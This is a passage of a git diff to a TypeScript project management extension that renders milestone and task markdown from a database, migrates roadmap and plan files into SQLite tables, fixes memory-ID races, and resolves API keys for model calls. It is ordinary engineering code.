+          } else if (!isCompleteInDb && roadmapSlice.done) {
+            stale.push({
+              path: roadmapPath,
+              reason: `${slice.id} is not complete in DB but checked in roadmap`,
+            });
+          }
+        }
+      } catch (e) {
+        logWarning("renderer", `roadmap parse failed: ${(e as Error).message}`);
+      }
+    }
+
+    // ── Check plan checkbox state and summaries for each slice ────────
+    for (const slice of slices) {
+      const tasks = getSliceTasks(milestone.id, slice.id);
+
+      // Check plan checkboxes
+      const planPath = resolveSliceFile(basePath, milestone.id, slice.id, "PLAN");
+      if (planPath && existsSync(planPath)) {
+        try {
+          const content = readFileSync(planPath, "utf-8");
+          const parsed = parsePlan(content);
+
+          for (const task of tasks) {
+            const isDoneInDb = isClosedStatus(task.status);
+            const planTask = parsed.tasks.find((t: { id: string }) => t.id === task.id);
+            if (!planTask) continue;
+
+            if (isDoneInDb && !planTask.done) {
+              stale.push({
+                path: planPath,
+                reason: `${task.id} is done in DB but unchecked in plan`,
+              });
+            } else if (!isDoneInDb && planTask.done) {
+              stale.push({
+                path: planPath,
+                reason: `${task.id} is not done in DB but checked in plan`,
+              });
+            }
+          }
+        } catch (e) {
+          logWarning("renderer", `plan parse failed: ${(e as Error).message}`);
+        }
+      }
+
+      // Check missing task summary files
+      for (const task of tasks) {
+        if (isClosedStatus(task.status) && task.full_summary_md) {
+          const slicePath = resolveSlicePath(basePath, milestone.id, slice.id);
+          if (slicePath) {
+            const tasksDir = join(slicePath, "tasks");
+            const fileName = buildTaskFileName(task.id, "SUMMARY");
+            const summaryAbsPath = join(tasksDir, fileName);
+
+            if (!existsSync(summaryAbsPath)) {
+              stale.push({
+                path: summaryAbsPath,
+                reason: `${task.id} is complete with summary in DB but SUMMARY.md missing on disk`,
+              });
+            }
+          }
+        }
+      }
+
+      // Check missing slice summary/UAT files
+      const sliceRow = getSlice(milestone.id, slice.id);
+      if (sliceRow && sliceRow.status === "complete") {
+        const slicePath = resolveSlicePath(basePath, milestone.id, slice.id);
+        if (slicePath) {
+          if (sliceRow.full_summary_md) {
+            const summaryName = buildSliceFileName(slice.id, "SUMMARY");
+            const summaryAbsPath = join(slicePath, summaryName);
+            if (!existsSync(summaryAbsPath)) {
+              stale.push({
+                path: summaryAbsPath,
+                reason: `${slice.id} is complete with summary in DB but SUMMARY.md missing on disk`,
+              });
+            }
+          }
+
+          if (sliceRow.full_uat_md) {
+            const uatName = buildSliceFileName(slice.id, "UAT");
+            const uatAbsPath = join(slicePath, uatName);
+            if (!existsSync(uatAbsPath)) {
+              stale.push({
+                path: uatAbsPath,
+                reason: `${slice.id} is complete with UAT in DB but UAT.md missing on disk`,
+              });
+            }
+          }
+        }
+      }
+    }
+  }
+
+  if (stale.length > 0) {
+    process.stderr.write(
+      `markdown-renderer: detected ${stale.length} stale render(s):\n`,
+    );
+    for (const entry of stale) {
+      process.stderr.write(`  - ${entry.path}: ${entry.reason}\n`);
+    }
+  }
+
+  return stale;
+}
+
+// ─── Stale Repair ─────────────────────────────────────────────────────────
+
+/**
+ * Repair all stale renders detected by `detectStaleRenders()`.
+ *
+ * For each stale entry, calls the appropriate render function:
+ * - Roadmap checkbox mismatches → renderRoadmapCheckboxes()
+ * - Plan checkbox mismatches → renderPlanCheckboxes()
+ * - Missing task summaries → renderTaskSummary()
+ * - Missing slice summaries/UATs → renderSliceSummary()
+ *
+ * Idempotent: calling twice with no DB changes produces zero repairs on the second call.
+ *
+ * @returns the number of files repaired
+ */
+export async function repairStaleRenders(basePath: string): Promise<number> {
+  const staleEntries = detectStaleRenders(basePath);
+  if (staleEntries.length === 0) return 0;
+
+  // Deduplicate: a single roadmap/plan file might appear multiple times
+  // (once per mismatched checkbox). We only need to re-render it once.
+  const repairedPaths = new Set<string>();
+  let repairCount = 0;
+
+  for (const entry of staleEntries) {
+    if (repairedPaths.has(entry.path)) continue;
+    // Normalize path separators for cross-platform regex matching
+    const normPath = entry.path.replace(/\\/g, "/");
+
+    try {
+      // Determine repair action from the reason
+      if (entry.reason.includes("in roadmap")) {
+        // Roadmap checkbox mismatch — extract milestone ID from path
+        const milestoneMatch = normPath.match(/milestones\/([^/]+)\//);
+        if (milestoneMatch) {
+          const ok = await renderRoadmapCheckboxes(basePath, milestoneMatch[1]);
+          if (ok) {
+            repairedPaths.add(entry.path);
+            repairCount++;
+          }
+        }
+      } else if (entry.reason.includes("in plan")) {
+        // Plan checkbox mismatch — extract milestone + slice IDs from path
+        const pathMatch = normPath.match(/milestones\/([^/]+)\/slices\/([^/]+)\//);
+        if (pathMatch) {
+          const ok = await renderPlanCheckboxes(basePath, pathMatch[1], pathMatch[2]);
+          if (ok) {
+            repairedPaths.add(entry.path);
+            repairCount++;
+          }
+        }
+      } else if (entry.reason.includes("SUMMARY.md missing") && entry.reason.match(/^T\d+/)) {
+        // Missing task summary — extract IDs from path
+        const pathMatch = normPath.match(/milestones\/([^/]+)\/slices\/([^/]+)\/tasks\//);
+        const taskMatch = entry.reason.match(/^(T\d+)/);
+        if (pathMatch && taskMatch) {
+          const ok = await renderTaskSummary(basePath, pathMatch[1], pathMatch[2], taskMatch[1]);
+          if (ok) {
+            repairedPaths.add(entry.path);
+            repairCount++;
+          }
+        }
+      } else if (entry.reason.includes("SUMMARY.md missing") && entry.reason.match(/^S\d+/)) {
+        // Missing slice summary — extract IDs from path
+        const pathMatch = normPath.match(/milestones\/([^/]+)\/slices\/([^/]+)\//);
+        if (pathMatch) {
+          const ok = await renderSliceSummary(basePath, pathMatch[1], pathMatch[2]);
+          if (ok) {
+            repairedPaths.add(entry.path);
+            repairCount++;
+          }
+        }
+      } else if (entry.reason.includes("UAT.md missing")) {
+        // Missing slice UAT — renderSliceSummary handles both SUMMARY + UAT
+        const pathMatch = normPath.match(/milestones\/([^/]+)\/slices\/([^/]+)\//);
+        if (pathMatch) {
+          const ok = await renderSliceSummary(basePath, pathMatch[1], pathMatch[2]);
+          if (ok) {
+            repairedPaths.add(entry.path);
+            repairCount++;
+          }
+        }
+      }
+    } catch (err) {
+      logWarning("renderer", `repair failed for ${entry.path}: ${(err as Error).message}`);
+    }
+  }
+
+  if (repairCount > 0) {
+    process.stderr.write(
+      `markdown-renderer: repaired ${repairCount} stale render(s)\n`,
+    );
+  }
+
+  return repairCount;
+}
+
+// ─── Replan & Assessment Renderers ────────────────────────────────────────
+
+export interface ReplanData {
+  blockerTaskId: string;
+  blockerDescription: string;
+  whatChanged: string;
+}
+
+export interface AssessmentData {
+  verdict: string;
+  assessment: string;
+  completedSliceId?: string;
+}
+
+export async function renderReplanFromDb(
+  basePath: string,
+  milestoneId: string,
+  sliceId: string,
+  replanData: ReplanData,
+): Promise<{ replanPath: string; content: string }> {
+  const slicePath = resolveSlicePath(basePath, milestoneId, sliceId)
+    ?? join(gsdRoot(basePath), "milestones", milestoneId, "slices", sliceId);
+  const absPath = join(slicePath, `${sliceId}-REPLAN.md`);
+  const artifactPath = toArtifactPath(absPath, basePath);
+
+  const lines: string[] = [];
+  lines.push(`# ${sliceId} Replan`);
+  lines.push("");
+  lines.push(`**Milestone:** ${milestoneId}`);
+  lines.push(`**Slice:** ${sliceId}`);
+  lines.push(`**Blocker Task:** ${replanData.blockerTaskId}`);
+  lines.push(`**Created:** ${new Date().toISOString()}`);
+  lines.push("");
+  lines.push("## Blocker Description");
+  lines.push("");
+  lines.push(replanData.blockerDescription);
+  lines.push("");
+  lines.push("## What Changed");
+  lines.push("");
+  lines.push(replanData.whatChanged);
+  lines.push("");
+
+  const content = `${lines.join("\n").trimEnd()}\n`;
+
+  await writeAndStore(absPath, artifactPath, content, {
+    artifact_type: "REPLAN",
+    milestone_id: milestoneId,
+    slice_id: sliceId,
+  });
+
+  return { replanPath: absPath, content };
+}
+
+export async function renderAssessmentFromDb(
+  basePath: string,
+  milestoneId: string,
+  sliceId: string,
+  assessmentData: AssessmentData,
+): Promise<{ assessmentPath: string; content: string }> {
+  const slicePath = resolveSlicePath(basePath, milestoneId, sliceId)
+    ?? join(gsdRoot(basePath), "milestones", milestoneId, "slices", sliceId);
+  const absPath = join(slicePath, `${sliceId}-ASSESSMENT.md`);
+  const artifactPath = toArtifactPath(absPath, basePath);
+
+  const lines: string[] = [];
+  lines.push(`# ${sliceId} Assessment`);
+  lines.push("");
+  lines.push(`**Milestone:** ${milestoneId}`);
+  lines.push(`**Slice:** ${sliceId}`);
+  if (assessmentData.completedSliceId) {
+    lines.push(`**Completed Slice:** ${assessmentData.completedSliceId}`);
+  }
+  lines.push(`**Verdict:** ${assessmentData.verdict}`);
+  lines.push(`**Created:** ${new Date().toISOString()}`);
+  lines.push("");
+  lines.push("## Assessment");
+  lines.push("");
+  lines.push(assessmentData.assessment);
+  lines.push("");
+
+  const content = `${lines.join("\n").trimEnd()}\n`;
+
+  await writeAndStore(absPath, artifactPath, content, {
+    artifact_type: "ASSESSMENT",
+    milestone_id: milestoneId,
+    slice_id: sliceId,
+  });
+
+  return { assessmentPath: absPath, content };
+}
diff --git a/src/resources/extensions/gsd/md-importer.ts b/src/resources/extensions/gsd/md-importer.ts
index 6a58e7e82..aaa6aa612 100644
--- a/src/resources/extensions/gsd/md-importer.ts
+++ b/src/resources/extensions/gsd/md-importer.ts
@@ -11,17 +11,27 @@ import {
   upsertDecision,
   upsertRequirement,
   insertArtifact,
+  insertMilestone,
+  insertSlice,
+  insertTask,
   openDatabase,
   transaction,
   _getAdapter,
 } from './gsd-db.js';
 import {
   resolveGsdRootFile,
+  resolveMilestoneFile,
+  resolveSliceFile,
+  resolveSlicePath,
+  resolveTasksDir,
   milestonesDir,
   gsdRoot,
   resolveTaskFiles,
 } from './paths.js';
 import { findMilestoneIds } from './guided-flow.js';
+import { parseRoadmap, parsePlan } from './parsers-legacy.js';
+import { parseContextDependsOn } from './files.js';
+import { logWarning } from './workflow-logger.js';
 
 // ─── DECISIONS.md Parser ───────────────────────────────────────────────────
 
@@ -480,6 +490,205 @@ function findFileByPrefixAndSuffix(dir: string, idPrefix: string, suffix: string
   }
 }
 
+// ─── Hierarchy Migration (milestones/slices/tasks from roadmaps+plans) ────
+
+/**
+ * Walk .gsd/milestones/ dirs, parse roadmaps and plans, and populate
+ * the milestones/slices/tasks DB tables.
+ *
+ * - Milestone title: from roadmap H1 (e.g. "# M001: Title") or CONTEXT.md
+ * - Milestone status: 'complete' if SUMMARY exists, 'parked' if PARKED exists, else 'active'
+ * - Milestone depends_on: from CONTEXT.md frontmatter
+ * - Slice metadata: from parseRoadmap() — id, title, risk, depends, done, demo
+ * - Task metadata: from parsePlan() — id, title, done, estimate
+ *
+ * Uses INSERT OR IGNORE for idempotency. Insert order: milestones → slices → tasks.
+ * Ghost milestones (dirs with no CONTEXT, ROADMAP, or SUMMARY) are skipped.
+ *
+ * Returns count of inserted hierarchy items.
+ */
+export function migrateHierarchyToDb(basePath: string): {
+  milestones: number;
+  slices: number;
+  tasks: number;
+} {
+  const counts = { milestones: 0, slices: 0, tasks: 0 };
+  const milestoneIds = findMilestoneIds(basePath);
+
+  for (const milestoneId of milestoneIds) {
+    // Check for ghost milestones — skip dirs with no meaningful content
+    const roadmapPath = resolveMilestoneFile(basePath, milestoneId, 'ROADMAP');
+    const contextPath = resolveMilestoneFile(basePath, milestoneId, 'CONTEXT');
+    const summaryPath = resolveMilestoneFile(basePath, milestoneId, 'SUMMARY');
+    const parkedPath = resolveMilestoneFile(basePath, milestoneId, 'PARKED');
+
+    const hasRoadmap = roadmapPath !== null && existsSync(roadmapPath);
+    const hasContext = contextPath !== null && existsSync(contextPath);
+    const hasSummary = summaryPath !== null && existsSync(summaryPath);
+    const hasParked = parkedPath !== null && existsSync(parkedPath);
+
+    // Ghost milestone: no CONTEXT, ROADMAP, or SUMMARY → skip
+    if (!hasRoadmap && !hasContext && !hasSummary) continue;
+
+    // Determine milestone title from roadmap H1 or CONTEXT heading
+    let milestoneTitle = '';
+    let roadmapContent: string | null = null;
+    let roadmap: ReturnType<typeof parseRoadmap> | null = null;
+    if (hasRoadmap) {
+      roadmapContent = readFileSync(roadmapPath!, 'utf-8');
+      roadmap = parseRoadmap(roadmapContent);
+      milestoneTitle = roadmap.title;
+    }
+
+    // Determine milestone status
+    let milestoneStatus = 'active';
+    if (hasSummary) milestoneStatus = 'complete';
+    else if (hasParked) milestoneStatus = 'parked';
+    // Import milestones with all-done roadmap slices as complete (#3390, #3379)
+    // even when SUMMARY.md is missing — the roadmap checkboxes are authoritative.
+    else if (roadmap && roadmap.slices.length > 0 && roadmap.slices.every(s => s.done)) {
+      milestoneStatus = 'complete';
+    }
+    if (!milestoneTitle && hasContext) {
+      const contextContent = readFileSync(contextPath!, 'utf-8');
+      const h1Match = contextContent.match(/^#\s+(.+)/m);
+      if (h1Match) milestoneTitle = h1Match[1].trim();
+    }
+
+    // Determine depends_on from CONTEXT frontmatter
+    let dependsOn: string[] = [];
+    if (hasContext) {
+      const contextContent = readFileSync(contextPath!, 'utf-8');
+      dependsOn = parseContextDependsOn(contextContent);
+    }
+
+    // Extract raw "## Boundary Map" section from roadmap markdown for planning column
+    let boundaryMapSection = '';
+    if (roadmapContent) {
+      const bmIdx = roadmapContent.indexOf('## Boundary Map');
+      if (bmIdx >= 0) {
+        const afterBm = roadmapContent.slice(bmIdx);
+        // Take content until next ## heading or EOF
+        const nextHeading = afterBm.indexOf('\n## ', 1);
+        boundaryMapSection = nextHeading >= 0 ? afterBm.slice(0, nextHeading).trim() : afterBm.trim();
+      }
+    }
+
+    // Insert milestone (FK parent — must come first)
+    insertMilestone({
+      id: milestoneId,
+      title: milestoneTitle,
+      status: milestoneStatus,
+      depends_on: dependsOn,
+      planning: {
+        vision: roadmap?.vision ?? '',
+        successCriteria: roadmap?.successCriteria ?? [],
+        boundaryMapMarkdown: boundaryMapSection,
+      },
+    });
+    counts.milestones++;
+
+    // Parse roadmap for slices
+    if (!roadmap) continue;
+
+    for (let si = 0; si < roadmap.slices.length; si++) {
+      const sliceEntry = roadmap.slices[si]!;
+      // Per K002: use 'complete' not 'done'
+      const sliceStatus = sliceEntry.done ? 'complete' : 'pending';
+
+      // Parse slice plan early so goal is available for insertSlice planning column
+      const planPath = resolveSliceFile(basePath, milestoneId, sliceEntry.id, 'PLAN');
+      let plan: ReturnType<typeof parsePlan> | null = null;
+      if (planPath && existsSync(planPath)) {
+        const planContent = readFileSync(planPath, 'utf-8');
+        plan = parsePlan(planContent);
+      }
+
+      insertSlice({
+        id: sliceEntry.id,
+        milestoneId: milestoneId,
+        title: sliceEntry.title,
+        status: sliceStatus,
+        risk: sliceEntry.risk,
+        depends: sliceEntry.depends,
+        demo: sliceEntry.demo,
+        sequence: si + 1, // Preserve roadmap parse order (#3356)
+        planning: {
+          goal: plan?.goal ?? '',
+        },
+      });
+      counts.slices++;
+
+      // Insert tasks from parsed plan
+      if (!plan) continue;
+
+      for (const taskEntry of plan.tasks) {
+        // Per K002: use 'complete' not 'done'
+        let taskStatus: string = taskEntry.done ? 'complete' : 'pending';
+
+        // Pre-migration consistency: if task is marked done in the plan but has
+        // no summary file on disk, import as 'pending' so it gets re-executed
+        // rather than silently importing bad state as the new DB authority.
+        if (taskStatus === 'complete') {
+          const tDir = resolveTasksDir(basePath, milestoneId, sliceEntry.id);
+          if (tDir) {
+            const summaryFile = join(tDir, `${taskEntry.id}-SUMMARY.md`);
+            if (!existsSync(summaryFile)) {
+              taskStatus = 'pending';
+              process.stderr.write(
+                `gsd-migrate: ${milestoneId}/${sliceEntry.id}/${taskEntry.id} marked done but missing summary — importing as pending\n`,
+              );
+            }
+          }
+        }
+
+        insertTask({
+          id: taskEntry.id,
+          sliceId: sliceEntry.id,
+          milestoneId: milestoneId,
+          title: taskEntry.title,
+          status: taskStatus,
+          planning: {
+            files: taskEntry.files ?? [],
+            verify: taskEntry.verify ?? '',
+          },
+        });
+        counts.tasks++;
+      }
+
+      // Pre-migration consistency: if all tasks are done and the slice
+      // summary exists but the roadmap checkbox is unchecked, upgrade the
+      // slice to complete. This handles the common
+      // "all_tasks_done_roadmap_not_checked" inconsistency that the old
+      // doctor would have auto-fixed. Without a slice summary, the slice
+      // is in the "summarizing" phase, not complete.
+      if (!sliceEntry.done) {
+        const sliceSummaryPath = resolveSliceFile(basePath, milestoneId, sliceEntry.id, 'SUMMARY');
+        const hasSliceSummary = sliceSummaryPath !== null && existsSync(sliceSummaryPath);
+        const allTasksDone = plan.tasks.length > 0 && plan.tasks.every(t => {
+          const tDir = resolveTasksDir(basePath, milestoneId, sliceEntry.id);
+          if (!tDir) return t.done;
+          const summaryFile = join(tDir, `${t.id}-SUMMARY.md`);
+          return t.done && existsSync(summaryFile);
+        });
+        if (allTasksDone && hasSliceSummary) {
+          const adapter = _getAdapter();
+          if (adapter) {
+            adapter.prepare(
+              `UPDATE slices SET status = 'complete' WHERE id = :sid AND milestone_id = :mid`,
+            ).run({ ':sid': sliceEntry.id, ':mid': milestoneId });
+            process.stderr.write(
+              `gsd-migrate: ${milestoneId}/${sliceEntry.id} all tasks + slice summary complete — upgrading slice to complete\n`,
+            );
+          }
+        }
+      }
+    }
+  }
+
+  return counts;
+}
+
 // ─── Orchestrator ──────────────────────────────────────────────────────────
 
 /**
@@ -493,6 +702,7 @@ export function migrateFromMarkdown(gsdDir: string): {
   decisions: number;
   requirements: number;
   artifacts: number;
+  hierarchy: { milestones: number; slices: number; tasks: number };
 } {
   const dbPath = join(gsdRoot(gsdDir), 'gsd.db');
 
@@ -504,30 +714,37 @@ export function migrateFromMarkdown(gsdDir: string): {
   let decisions = 0;
   let requirements = 0;
   let artifacts = 0;
+  let hierarchy = { milestones: 0, slices: 0, tasks: 0 };
 
   transaction(() => {
     try {
       decisions = importDecisions(gsdDir);
     } catch (err) {
-      process.stderr.write(`gsd-migrate: skipping decisions import: ${(err as Error).message}\n`);
+      logWarning("migration", `skipping decisions import: ${(err as Error).message}`);
     }
 
     try {
       requirements = importRequirements(gsdDir);
     } catch (err) {
-      process.stderr.write(`gsd-migrate: skipping requirements import: ${(err as Error).message}\n`);
+      logWarning("migration", `skipping requirements import: ${(err as Error).message}`);
     }
 
     try {
       artifacts = importHierarchyArtifacts(gsdDir);
     } catch (err) {
-      process.stderr.write(`gsd-migrate: skipping artifacts import: ${(err as Error).message}\n`);
+      logWarning("migration", `skipping artifacts import: ${(err as Error).message}`);
+    }
+
+    try {
+      hierarchy = migrateHierarchyToDb(gsdDir);
+    } catch (err) {
+      logWarning("migration", `skipping hierarchy migration: ${(err as Error).message}`);
     }
   });
 
   process.stderr.write(
-    `gsd-migrate: imported ${decisions} decisions, ${requirements} requirements, ${artifacts} artifacts\n`,
+    `gsd-migrate: imported ${decisions} decisions, ${requirements} requirements, ${artifacts} artifacts, ${hierarchy.milestones}M/${hierarchy.slices}S/${hierarchy.tasks}T hierarchy\n`,
   );
 
-  return { decisions, requirements, artifacts };
+  return { decisions, requirements, artifacts, hierarchy };
 }
diff --git a/src/resources/extensions/gsd/memory-extractor.ts b/src/resources/extensions/gsd/memory-extractor.ts
index c63a385a5..acca3c7a0 100644
--- a/src/resources/extensions/gsd/memory-extractor.ts
+++ b/src/resources/extensions/gsd/memory-extractor.ts
@@ -87,14 +87,22 @@ export function buildMemoryLLMCall(ctx: ExtensionContext): LLMCallFn | null {
 
     const selectedModel = model as Model<Api>;
 
+    // Resolve API key via modelRegistry so OAuth tokens (auth.json) are used.
+    // Without this, streamSimpleAnthropic only checks env vars via getEnvApiKey,
+    // which returns undefined for OAuth users (Claude Max / Claude Pro).
+    // See: https://github.com/gsd-build/gsd-2/issues/2959
+    const resolvedKeyPromise = ctx.modelRegistry.getApiKey(selectedModel).catch(() => undefined);
+
     return async (system: string, user: string): Promise<string> => {
       const { completeSimple } = await import('@gsd/pi-ai');
+      const resolvedApiKey = await resolvedKeyPromise;
       const result: AssistantMessage = await completeSimple(selectedModel, {
         systemPrompt: system,
         messages: [{ role: 'user', content: [{ type: 'text', text: user }], timestamp: Date.now() }],
       }, {
         maxTokens: 2048,
         temperature: 0,
+        ...(resolvedApiKey ? { apiKey: resolvedApiKey } : {}),
       });
 
       // Extract text from response
diff --git a/src/resources/extensions/gsd/memory-store.ts b/src/resources/extensions/gsd/memory-store.ts
index b7d0094d4..23d7aa5d3 100644
--- a/src/resources/extensions/gsd/memory-store.ts
+++ b/src/resources/extensions/gsd/memory-store.ts
@@ -125,6 +125,9 @@ export function getActiveMemoriesRanked(limit = 30): Memory[] {
 /**
  * Generate the next memory ID: MEM + zero-padded 3-digit from MAX(seq).
  * Returns MEM001 if no memories exist.
+ *
+ * NOTE: For race-safe creation, prefer createMemory() which inserts with a
+ * placeholder ID then updates to the seq-derived ID atomically.
  */
 export function nextMemoryId(): string {
   if (!isDbAvailable()) return 'MEM001';
@@ -147,7 +150,9 @@ export function nextMemoryId(): string {
 // ─── Mutation Functions ─────────────────────────────────────────────────────
 
 /**
- * Insert a new memory with auto-assigned ID.
+ * Insert a new memory with a race-safe auto-assigned ID.
+ * Uses AUTOINCREMENT seq to derive the ID after insert, avoiding
+ * the read-then-write race in concurrent scenarios (e.g. worktrees).
  * Returns the assigned ID, or null on failure.
  */
 export function createMemory(fields: {
@@ -162,13 +167,14 @@ export function createMemory(fields: {
   if (!adapter) return null;
 
   try {
-    const id = nextMemoryId();
     const now = new Date().toISOString();
+    // Insert with a temporary placeholder ID — seq is auto-assigned
+    const placeholder = `_TMP_${Date.now()}_${Math.random().toString(36).slice(2, 8)}`;
     adapter.prepare(
       `INSERT INTO memories (id, category, content, confidence, source_unit_type, source_unit_id, created_at, updated_at)
        VALUES (:id, :category, :content, :confidence, :source_unit_type, :source_unit_id, :created_at, :updated_at)`,
     ).run({
-      ':id': id,
+      ':id': placeholder,
       ':category': fields.category,
       ':content': fields.content,
       ':confidence': fields.confidence ?? 0.8,
@@ -177,7 +183,16 @@ export function createMemory(fields: {
       ':created_at': now,
       ':updated_at': now,
     });
-    return id;
+    // Derive the real ID from the assigned seq
+    const row = adapter.prepare('SELECT seq FROM memories WHERE id = :id').get({ ':id': placeholder });
+    if (!row) return placeholder; // fallback — should not happen
+    const seq = row['seq'] as number;
+    const realId = `MEM${String(seq).padStart(3, '0')}`;
+    adapter.prepare('UPDATE memories SET id = :real_id WHERE id = :placeholder').run({
+      ':real_id': realId,
+      ':placeholder': placeholder,
+    });
+    return realId;
   } catch {
     return null;
   }
@@ -331,20 +346,16 @@ export function enforceMemoryCap(max = 50): void {
     if (count <= max) return;
 
     const excess = count - max;
-    // Find the IDs of the lowest-ranked active memories
-    const rows = adapter.prepare(
-      `SELECT id FROM memories
-       WHERE superseded_by IS NULL
-       ORDER BY (confidence * (1.0 + hit_count * 0.1)) ASC
-       LIMIT :limit`,
-    ).all({ ':limit': excess });
-
-    const now = new Date().toISOString();
-    for (const row of rows) {
-      adapter.prepare(
-        'UPDATE memories SET superseded_by = :reason, updated_at = :now WHERE id = :id',
-      ).run({ ':reason': 'CAP_EXCEEDED', ':now': now, ':id': row['id'] as string });
-    }
+    // Batch update: supersede lowest-ranked active memories in a single statement
+    adapter.prepare(
+      `UPDATE memories SET superseded_by = 'CAP_EXCEEDED', updated_at = :now
+       WHERE id IN (
+         SELECT id FROM memories
+         WHERE superseded_by IS NULL
+         ORDER BY (confidence * (1.0 + hit_count * 0.1)) ASC
+         LIMIT :limit
+       )`,
+    ).run({ ':now': new Date().toISOString(), ':limit': excess });
   } catch {
     // non-fatal
   }
diff --git a/src/resources/extensions/gsd/metrics.ts b/src/resources/extensions/gsd/metrics.ts
index ba86c7ab6..a29d4f39d 100644
--- a/src/resources/extensions/gsd/metrics.ts
+++ b/src/resources/extensions/gsd/metrics.ts
@@ -75,13 +75,16 @@ export interface MetricsLedger {
 
 // ─── Phase classification ─────────────────────────────────────────────────────
 
-export type MetricsPhase = "research" | "planning" | "execution" | "completion" | "reassessment";
+export type MetricsPhase = "research" | "discussion" | "planning" | "execution" | "completion" | "reassessment";
 
 export function classifyUnitPhase(unitType: string): MetricsPhase {
   switch (unitType) {
     case "research-milestone":
     case "research-slice":
       return "research";
+    case "discuss-milestone":
+    case "discuss-slice":
+      return "discussion";
     case "plan-milestone":
     case "plan-slice":
       return "planning";
@@ -299,7 +302,7 @@ export function aggregateByPhase(units: UnitMetrics[]): PhaseAggregate[] {
     agg.duration += u.finishedAt - u.startedAt;
   }
   // Return in a stable order
-  const order: MetricsPhase[] = ["research", "planning", "execution", "completion", "reassessment"];
+  const order: MetricsPhase[] = ["research", "discussion", "planning", "execution", "completion", "reassessment"];
   return order.map(p => map.get(p)).filter((a): a is PhaseAggregate => !!a);
 }
 
@@ -564,7 +567,34 @@ export function loadLedgerFromDisk(base: string): MetricsLedger | null {
 }
 
 function loadLedger(base: string): MetricsLedger {
-  return loadJsonFile(metricsPath(base), isMetricsLedger, defaultLedger);
+  const raw = loadJsonFile(metricsPath(base), isMetricsLedger, defaultLedger);
+  const before = raw.units.length;
+  raw.units = deduplicateUnits(raw.units);
+  if (raw.units.length < before) {
+    // Persist the cleaned ledger so duplicates don't re-accumulate
+    saveLedger(base, raw);
+  }
+  return raw;
+}
+
+/**
+ * Collapse duplicate entries with the same (type, id, startedAt) triple.
+ * Keeps the entry with the highest finishedAt (the most complete snapshot).
+ *
+ * This is a defensive measure against idle-watchdog race conditions that can
+ * produce duplicate entries on disk despite the in-memory idempotency guard
+ * in snapshotUnitMetrics(). See #1943.
+ */
+function deduplicateUnits(units: UnitMetrics[]): UnitMetrics[] {
+  const map = new Map<string, UnitMetrics>();
+  for (const u of units) {
+    const key = `${u.type}\0${u.id}\0${u.startedAt}`;
+    const existing = map.get(key);
+    if (!existing || u.finishedAt > existing.finishedAt) {
+      map.set(key, u);
+    }
+  }
+  return Array.from(map.values());
 }
 
 function saveLedger(base: string, data: MetricsLedger): void {
diff --git a/src/resources/extensions/gsd/migrate-external.ts b/src/resources/extensions/gsd/migrate-external.ts
index 4fd53e7d1..1f9786799 100644
--- a/src/resources/extensions/gsd/migrate-external.ts
+++ b/src/resources/extensions/gsd/migrate-external.ts
@@ -9,7 +9,7 @@
 import { execFileSync } from "node:child_process";
 import { existsSync, lstatSync, mkdirSync, readdirSync, realpathSync, renameSync, cpSync, rmSync, symlinkSync } from "node:fs";
 import { join } from "node:path";
-import { externalGsdRoot } from "./repo-identity.js";
+import { externalGsdRoot, isInsideWorktree } from "./repo-identity.js";
 import { getErrorMessage } from "./error-utils.js";
 import { hasGitTrackedGsdFiles } from "./gitignore.js";
 import { GIT_NO_PROMPT_ENV } from "./git-constants.js";
@@ -34,6 +34,14 @@ export interface MigrationResult {
  * 3. On failure: rename `.gsd.migrating` back to `.gsd` (rollback)
  */
 export function migrateToExternalState(basePath: string): MigrationResult {
+  // Worktrees get their .gsd via syncGsdStateToWorktree(), not migration.
+  // Migration inside a worktree would compute the same external hash as the
+  // main repo (externalGsdRoot hashes remoteUrl + gitRoot), creating a broken
+  // junction and orphaning .gsd.migrating (#2970).
+  if (isInsideWorktree(basePath)) {
+    return { migrated: false };
+  }
+
   const localGsd = join(basePath, ".gsd");
 
   // Skip if doesn't exist
diff --git a/src/resources/extensions/gsd/milestone-actions.ts b/src/resources/extensions/gsd/milestone-actions.ts
index 79851f178..49102dc25 100644
--- a/src/resources/extensions/gsd/milestone-actions.ts
+++ b/src/resources/extensions/gsd/milestone-actions.ts
@@ -20,6 +20,8 @@ import {
 } from "./paths.js";
 import { invalidateAllCaches } from "./cache.js";
 import { loadQueueOrder, saveQueueOrder } from "./queue-order.js";
+import { isDbAvailable, updateMilestoneStatus } from "./gsd-db.js";
+import { logWarning } from "./workflow-logger.js";
 
 // ─── Park ──────────────────────────────────────────────────────────────────
 
@@ -52,6 +54,14 @@ export function parkMilestone(basePath: string, milestoneId: string, reason: str
   ].join("\n");
 
   writeFileSync(parkedPath, content, "utf-8");
+  // Sync DB status so deriveStateFromDb also skips this milestone (#2694)
+  if (isDbAvailable()) {
+    try {
+      updateMilestoneStatus(milestoneId, "parked");
+    } catch (err) {
+      logWarning("engine", `parkMilestone DB sync failed for ${milestoneId}: ${(err as Error).message}`);
+    }
+  }
   invalidateAllCaches();
   return true;
 }
@@ -70,6 +80,14 @@ export function unparkMilestone(basePath: string, milestoneId: string): boolean
   if (!existsSync(parkedPath)) return false; // not parked
 
   unlinkSync(parkedPath);
+  // Sync DB status so deriveStateFromDb picks up the unparked milestone (#2694)
+  if (isDbAvailable()) {
+    try {
+      updateMilestoneStatus(milestoneId, "active");
+    } catch (err) {
+      logWarning("engine", `unparkMilestone DB sync failed for ${milestoneId}: ${(err as Error).message}`);
+    }
+  }
   invalidateAllCaches();
   return true;
 }
diff --git a/src/resources/extensions/gsd/milestone-ids.ts b/src/resources/extensions/gsd/milestone-ids.ts
index aa44c8f87..3d6d9592d 100644
--- a/src/resources/extensions/gsd/milestone-ids.ts
+++ b/src/resources/extensions/gsd/milestone-ids.ts
@@ -6,6 +6,7 @@
  */
 
 import { randomInt } from "node:crypto";
+import { logWarning } from "./workflow-logger.js";
 import { readdirSync, existsSync } from "node:fs";
 import { milestonesDir } from "./paths.js";
 import { loadQueueOrder, sortByQueueOrder } from "./queue-order.js";
@@ -128,7 +129,7 @@ export function findMilestoneIds(basePath: string): string[] {
   } catch (err) {
     // Log why milestone scanning failed — silent [] here causes infinite loops (#456)
     if (existsSync(dir)) {
-      console.error(`[gsd] findMilestoneIds: .gsd/milestones/ exists but readdirSync failed — ${getErrorMessage(err)}`);
+      logWarning("engine", `findMilestoneIds: .gsd/milestones/ exists but readdirSync failed — ${getErrorMessage(err)}`);
     }
     return [];
   }
diff --git a/src/resources/extensions/gsd/milestone-validation-gates.ts b/src/resources/extensions/gsd/milestone-validation-gates.ts
new file mode 100644
index 000000000..4dcd522b6
--- /dev/null
